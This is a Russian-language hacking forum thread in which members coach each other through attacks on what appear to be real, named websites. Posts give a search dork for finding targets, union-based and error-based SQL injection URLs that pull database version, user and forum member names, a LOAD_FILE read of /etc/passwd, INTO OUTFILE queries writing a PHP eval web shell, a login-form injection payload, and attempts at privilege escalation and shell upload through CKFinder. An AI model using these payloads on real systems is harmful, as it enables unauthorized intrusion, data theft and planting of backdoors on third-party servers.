Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    проблема в том, что в браузере по прежнему отображается ошибка, через http editor данные вытаскиваются, как быть?
     
  2. aldemko

    aldemko Member

    Joined:
    7 Sep 2015
    Messages:
    36
    Likes Received:
    6
    Reputations:
    0
    Доброго времени суток
    я совсем совсем новичек
    и так имеем мануал http://forum.antichat.ru/threads/43966/
    затем через гугл ищу
    Code:
    inurl:news-full.php?id=
    нашел ресурс
    Code:
    http://herorace.ru/news-full.php?id=1
    при запросе
    Code:
    http://herorace.ru/news-full.php?id=1%27
    выдает ошибку Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/u0093899/data/www/herorace.ru/news-full.php on line70
    
    следуя по мануалу пишу еще один запрос http://herorace.ru/news-full.php?id=1 -- 
    отображает тоже что и просто с 1 - опять же судя по мануалу все ок
    
    дальше следуя по мануалу нужно найти число столбцов я использовал 1' UNION SELECT 1, 2 -- 
    получалось http://herorace.ru/news-full.php?id=1' UNION SELECT 1, 2 -- 
    пробовал после прописывать цифры, 3 и так далее, ошибка со страницы не пропадала, и я решил попробовать с кол-вом полей
    1' GROUP BY 2 -- ошибка
    1' GROUP BY 10 -- ошибка
    1' GROUP BY 100 --
    1' GROUP BY 1 -- ошибка - и тут я понял что я наверное что то не так делаю, так как в любом случае полей не может быть меньше чем 1
    я решил попробовать 1' GROUP BY 0 -- и тоже ошибка
    
    
    подскажите что не так делаю ?
    спасиобо
     
  3. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    В вашем примере кавычка не нужна, у вас другой тип уязвимости, Integer.
    http://herorace.ru/news-full.php?id=1+order+by+1+--+ - TRUE
    http://herorace.ru/news-full.php?id=1+order+by+7+--+ - FALSE

    http://herorace.ru/news-full.php?id=1+union+select+1,2,3,4,5,6+--+ - TRUE
    Далее изменим id=1 на несуществующее значение, что бы убрать текст и вывести нужные нам данные
    http://herorace.ru/news-full.php?id=999999991+union+select+1,2,3,4,5,6+--+
    профит
    http://herorace.ru/news-full.php?id=999999991+union+select+1,2,version(),4,user(),6+--+

    не останавливайтесь на прочтении статьи, комментарии тоже полезные там есть
     
    #723 Br@!ns, 19 Oct 2015
    Last edited: 19 Oct 2015
  4. AlexG

    AlexG Member

    Joined:
    26 Sep 2015
    Messages:
    57
    Likes Received:
    12
    Reputations:
    5
    Хотел добавить - мануалы это НЕ инструкция к конкретным типам сайтов, это всего лишь общий алгоритм действий, а для понимания каждой конкретной ситуации мануалов надо прочитать много. И при поиске по доркам абсолютно не факт, что вы найдете сайты с аналогичными уязвимостями. Причин для этого много - например этот сайт уже ломали и кодер уже пытался "залатать" дыру.

    В песочнице, в конкурсе много сайтов живых и уже "расковырянных" - попробуйте с ними "поиграться".

    Ну и мое решение к этому вопросу:
    Code:
    http://herorace.ru/news-full.php?id=-1 union select 1,2,version(),4,database(),6
     
    aldemko and Br@!ns like this.
  5. aldemko

    aldemko Member

    Joined:
    7 Sep 2015
    Messages:
    36
    Likes Received:
    6
    Reputations:
    0
    и еще такой вопрос в продолжение к этому примеру если можно
    допустим я дошел до
    Code:
    +union+select+1,2,3,4,5,6+--+
    значения version() и database() методом ручной вставки в каждй столб вместо цифр вставлять или существует закономерность ?
    к примеру я изменив запрос на
    Code:
    с 1,2,version(),4,database(),6  на 1,2,3,4,5,database()+--+   уже не получаю вывод базы на сайте 


    PS Хотя нет получаю, только выводятся уже в другом месте - нашел в исходном коде
    спасибо


    PS 2 показывает что
    current user is DBA: False
    это значит залиться через уязвимость не получиться и искать другие ресурсы ?

    PS 3 http://forum.antichat.ru/threads/426171/page-5#post-3904335 мой первый самостоятельный сайт


    Еще пожалуйста по синтаксису помогите
    в общем столбцы узнал, базу узнал, права на запись есть
    файл passwd читается
    Code:
    0+UNION+SELECT+1,2,3,4,5,6,LOAD_FILE(%27/etc/passwd%27),8,9,10+--+
    нашел предположительные папки на запись
    пробую различные состявлять запросы на заливку файла пока не выходит
    Code:
    0+UNION+SELECT+1,2,3,%27<?php%20eval($_GET[‘e’])%20?>%27,5,6%20INTO%20OUTFILE%20%27/1.php%27,LOAD_FILE(%27/etc/passwd%27),8,9,10+--+
    
    
    затем я еще раз просмотрел почтовый ящик где мне мистер Br@!ns, давал рекомендации и практические примеры
    получился запрос 0+UNION+SELECT+1,2,%27<?php%20eval($_GET[cmd]);%20?>%27,4,5,6,7,8,9,10++into+outfile+%27/home/tesis/docs/123.php%27+--++--+
    который кстати как по мне работает - только вот в ответ Can't create/write to file '/home/tesis/docs/123.php' (Errcode: 13)  - но это уже говорит (я так думаю) о том что сам запрос верно составлен
    
    Теперь возникает вопрос, как искать доступные для записи папки ?
    я искал софтом uniscan - Но он показал что эта папка доступна для записи - точнее статус 200. но записаться я туда не могу почему то
    
    Подскажите как правильно искать папки для записи
    спасибо
    

    или все же запрос не правильно построил



    Вопрос все еще пока для меня актуален
    как найти папки для записи ? я в ручную уже за..... перебирать, там куча папок с под папками и прочее
    спасибо


    PS так же не понятки с @@basedir - показывает что домашняя папка /usr/ - но путь не раскрывает
    а ошибка на сайте указывает что сайт находится по /home/tesis/
    кому верить ?
    может изза не верно укзааного пути, я и не могу файл записать а uniscan не врал и папки действительно разрешены для записи
     
    #725 aldemko, 19 Oct 2015
    Last edited: 19 Oct 2015
  6. ButilkaSoka

    ButilkaSoka Member

    Joined:
    4 Jun 2015
    Messages:
    22
    Likes Received:
    12
    Reputations:
    0
    Использовать Burp Suite, символ %20 заменить на пробел.
     
    RedFern.89 likes this.
  7. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    а автоматизировать весь процесс через него тоже возможно? то есть перебор limit'a?
     
  8. Waki

    Waki Member

    Joined:
    9 Oct 2015
    Messages:
    55
    Likes Received:
    31
    Reputations:
    10
    Есть linux 2.6.32-042, шелл исполняется под права apache.
    В php.ini пустая строка в disable_functions, но не дает менять права на файлы, пробовал через php и через system.
    Возможно ли как нибудь повысить права?
    Находил вот такой эксплойт _ttps://www.exploit-db.com/exploits/18411/ , но что-то не догоню как его использовать.
     
  9. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    если его заменить на пробел, то запрос прерывается в burp suite на
    Code:
    /1'+(select!x-~0.FROM(select+(select
     
  10. ButilkaSoka

    ButilkaSoka Member

    Joined:
    4 Jun 2015
    Messages:
    22
    Likes Received:
    12
    Reputations:
    0
    Code:
    /news'+(select!x-~0.FROM(select+(select concat() )x)f)='/
     
  11. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    не помогло
     
  12. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    http://prntscr.com/8t332x
    через браузер. через burp suite запрос прерывается там же
     
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    /news'and(select!x-~0.FROM(select(select(concat(0x3c62723e,name,0x3c62723e))from(ipb_members)where(member_id='15664'))x)f)and'/
     
    _________________________
    RedFern.89 likes this.
  14. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    спасибо, все работает
     
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    можно узнать, как настроен rewriterule. а что вы хотите?
     
    _________________________
  16. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
  17. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    -----------------------------219001973211145\r\n
    Content-Disposition: form-data; name="authorize"\r\n
    \r\n
    1\r\n
    -----------------------------219001973211145\r\n
    Content-Disposition: form-data; name="login"\r\n
    \r\n
    admin'or(ExtractValue(1,concat(0x3a,(select(version())))))='1\r\n
    -----------------------------219001973211145\r\n
    Content-Disposition: form-data; name="password"\r\n
    \r\n
    sdsdgsg\r\n
    -----------------------------219001973211145--\r\n


    зачем sqlmap здесь?
     
  18. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    руками не дорос еще крутить
     
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _________________________
  20. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    помогите пожалуйста здесь в ckfinder'e 1.4.2 можно как нибудь шел залить?
    Как только не пробывал и через форму отдельную к connector'y и так
    Получается так; _php;.txt
    загруженный шел;
    aromagiya.kz/cms/uploads/files/Sh3LL_php;.txt
    ckfinder:
    aromagiya.kz/cms/files/appends/ckfinder/ckfinder.html